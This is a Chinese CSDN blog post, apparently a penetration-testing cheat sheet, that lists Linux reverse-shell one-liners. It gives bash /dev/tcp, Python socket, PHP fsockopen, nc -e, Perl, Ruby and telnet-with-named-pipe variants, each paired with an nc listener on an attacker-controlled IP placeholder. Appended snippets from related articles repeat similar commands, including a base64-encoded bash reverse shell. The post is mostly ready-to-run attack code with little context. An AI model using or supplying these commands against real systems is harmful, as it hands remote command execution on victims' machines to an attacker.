Linux下反弹shell命令

最新推荐文章于 2023-05-17 16:53:40 发布
最新推荐文章于 2023-05-17 16:53:40 发布
阅读量260 收藏 1
点赞数
分类专栏: 内网安全 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46804551/article/details/113728634
版权
本文详细介绍了如何在Linux环境下利用nc、bash、Python、PHP等多种编程语言实现反弹shell攻击,包括接收端的监听设置和发送端的代码示例。展示了在不同技术栈中实现远程shell控制的实战方法。
摘要由CSDN通过智能技术生成

Linux下反弹shell命令

接收端口和发送端端口要一致

bash反弹shell

接收端:

	nc -lvp 端口

发送端:

	bash -i >& /dev/tcp/接收端IP/接收端端口   0>&1
python反弹shell

接收端:

    nc -lvp 端口

发送端:

	python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("接收端ip",端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP反弹shell

接收端:

    nc -lvp 端口

发送端:

	php -r '$sock=fsockopen("接收端ip",端口);exec("/bin/bash -i <&3 >&3 2>&3");'
nc反弹shell

接收端:

    nc -lvp 端口

发送端

	nc -v 接收ip 端口 -e /bin/bash
perl反弹shell

接收端:

    nc -lvp 端口

发送端

	perl -e 'use Socket;$i="接收端ip";$p=端口;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
ruby反弹shell

接收端:

    nc -lvp 端口

发送端

	ruby -rsocket -e'f=TCPSocket.open("接收端ip",端口).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
telnet反弹shell

接收端:

    nc -lvp 端口

发送端

	mknod a p; telnet 接收端IP 端口 0<a | /bin/bash 1>a
. iDea.
关注
专栏目录
反弹shell
ADDPPC的博客
11-26 591
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、.
Linux反弹shell
weixin_64338385的博客
11-26 2312
0x01. bash 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 在攻击主机上执行端口监听: nc -lvvp port //port 为攻击主机端口 在目标主机上执行: bash -i >& /dev/tcp/攻击主机i...
Linux常用的反弹shell命令
m0_63200360的博客
04-24 2944
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。
反弹shell命令
种豆农夫的技术备忘录
08-24 545
节选自 https://www.freebuf.com/vuls/211847.html >> whereis nc bash python exec php nc: /usr/bin/nc /usr/share/man/man1/nc.1.gz bash: /usr/bin/bash /usr/share/man/man1/bash.1.gz python: /usr/bin/p...
Linux 反弹 Shell
sankgao 的博客
01-12 698
Linux 反弹 Shell
linux反弹shell命令解析
weixin_34381687的博客
09-02 98
今天在看spark stream的sample样例的时候看到linux的万金油命令nc。搜索相关的内容突然发现一个很好玩的用处就是反弹shell.下面我们就来讲讲反弹shell 1. 什么是反弹shell 简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。 2. 反弹shell的用途 这个反弹shell大部分用途是用来...
Linux下NC反弹shell命令(推荐)
09-15
本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作,并提供其他编程语言的反弹Shell命令作为参考。 首先,攻击者需要在自己的机器上启动一个监听服务来接收目标机器的连接。这通常通过以下`nc`命令完成: ...
mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1410
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
WEB安全基础 - - -Linux反弹shell
weixin_67503304的博客
08-23 3166
详细讲解Linux反弹shell包含的NC正向shell,NC反向shell,bash反弹shell,无e参数反弹shell,Base64编码绕过,Telnet反弹shell,OpenSSL反弹443端口,流量加密传输
反弹shell命令大全
G3et的博客
03-21 908
【代码】反弹shell命令大全。
Linux环境下的shell反弹
qq_55213436的博客
07-05 2082
在日常的渗透测试中,当我们拿到一个目标网站的漏洞的时候,往往可以采用shell反弹的方式来进行下一步的操作。反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。一般的shell反弹可以结合命令执行漏洞来实现。......
详解反弹shell命令
shy的博客
04-11 3552
在渗透过程中,经常需要反弹shell,因此总结一下linux反弹shell的几种姿势: bash -i >& /dev/tcp/ip/port 0>&1 bash -i本地打开一个bash >& 输出重定向,将标准输出和标准错误输出都重定向到远程。 /dev/tcp/ip/port/建立一个socket连接到另一个机器上,即远程到其他机...
反弹shell常用命令
mirocky的博客
01-15 8629
反弹shell常用命令 1 attacker端的监听——netcat (1) windows环境下下载netcat 下载地址 将如图的nc.exe所在文件夹添加到环境变量 (2) linux环境下下载netcat yum install netcat (3) 安装结束 使用如下命令判断是否安装成功 nc -h 使用如下命令开始监听 nc -lvvp port 2 靶机命令 (1) bash bash一句话为: bash -i >& /dev/tcp/ip/port 0>&a
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1242
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
Linux反弹shell学习
paidx0
09-06 1632
前言 当我们可以在远程Linux主机上执行任意命令或写入任意的数据到任意的文件的时候 通常会通过反弹一个shell 来控制远程主机 bash 反弹shell Linux反弹shell使用这条命令,但反弹回来的shell是不可交互的 bash -i >& /dev/tcp/10.10.10.134/2333 0>&1 也可以{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjI3LzQ0NDQgMD4mMSA=}|{base64,-
安全知识】——LInuxshell反弹姿势合集(更新中)
最新发布
Demo不是emo的博客
05-17 6229
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
Linux系统下Perl反弹Shell脚本解析
6. **反弹shell**:反弹shell是攻击者常用的手段之一,它允许攻击者从受害主机向攻击者的机器发送命令执行结果。在脚本中,`system($shell)`执行了/bin/bash shell,让攻击者可以通过网络控制被攻击的系统。 7. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值